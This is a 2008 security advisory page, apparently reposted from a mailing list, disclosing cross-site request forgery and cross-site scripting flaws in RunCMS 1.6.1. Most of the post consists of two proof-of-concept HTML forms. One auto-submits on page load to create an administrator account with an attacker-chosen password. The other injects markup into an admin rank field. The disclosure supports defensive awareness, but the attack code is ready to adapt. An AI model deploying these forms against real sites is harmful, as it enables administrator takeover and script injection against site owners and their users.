Computer Security

Security Advisory: RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilties
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  joomla SQL Injection(com_ric
ette)

  joomla SQL Injection (cat)(com
_downloads)

  Simple CMS <= 1.0.3 (indexen.php area) Remote SQL Injection Exploit

  Crafty Syntax Xss Vulnerability

From:nbbn_(at)_gmx.net <nbbn_(at)_gmx.net>
Date:18.02.2008
Subject:RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilties

###################################################################
RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilties           by NBBN
###################################################################

[b]
1) Create Webmaster (admin) XSRF Vulnerability[/b]
<html><head></head><body onLoad="javascript:document.attack.submit()">
<form action="http://localhost/xampp/runcms/modules/system/admin.php"
method="post" enctype="multipart/form-data" name="r">
<input type="hidden" name="uname" value="Attacker">
<input type="hidden" name="name" value="Attacker">
<input type="hidden" name="email" value="attack@attack.com">
<input type="hidden" name="url" value="">
<input type="hidden" name="user_avatar" value="blank.gif">
<input type="hidden" name="theme" value="helloween">
<input type="hidden" name="timezone_offset" value="0">
<input type="hidden" name="language" value="deutsch">
<input type="hidden" name="user_icq" value="">
<input type="hidden" name="user_aim" value="">
<input type="hidden" name="user_msnm" value="">
<input type="hidden" name="user_from" value="">
<input type="hidden" name="user_occ" value="">
<input type="hidden" name="user_intrest" value="">
<input type="hidden" name="user_birth%5b2%5D" value="">
<input type="hidden" name="user_birth%5B1%5D" value="">
<input type="hidden" name="user_birth%5BO%5D" value="">
<input type="hidden" name="user_sig" value="">
<input type="hidden" name="umode" value="flat">
<input type="hidden" name="uorder" value="1">
<input type="hidden" name="bio" value="">
<input type="hidden" name="rank" value="7">
<input type="hidden" name="pass" value="Password">
<input type="hidden" name="pass2" value="Password">
<input type="hidden" name="fct" value="users">
<input type="hidden" name="op" value="addUser">
<input type="hidden" name="submit" value="%DCbernehmen">

Also with XSRF an attacker can update the profile of all users. He can change
the password etc...

[b]2) Cross-Site Scripting (an attacker can only attack an admin)[/b]
<html><head></head><body onLoad="javascript:document.r.submit()">
<form action="http://localhost/xampp/runcms/modules/system/admin.php"
method="post" enctype="multipart/form-data" name="r">
<input type="text" class="text" name="rank_title" size="30" maxlength="50"
value="<marquee>Cross-Site Scritping :-("/>
<input type="hidden" name="fct" value="userrank">
<input type="hidden" name="op" value="RankForumAdd">
</form>
</body>
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server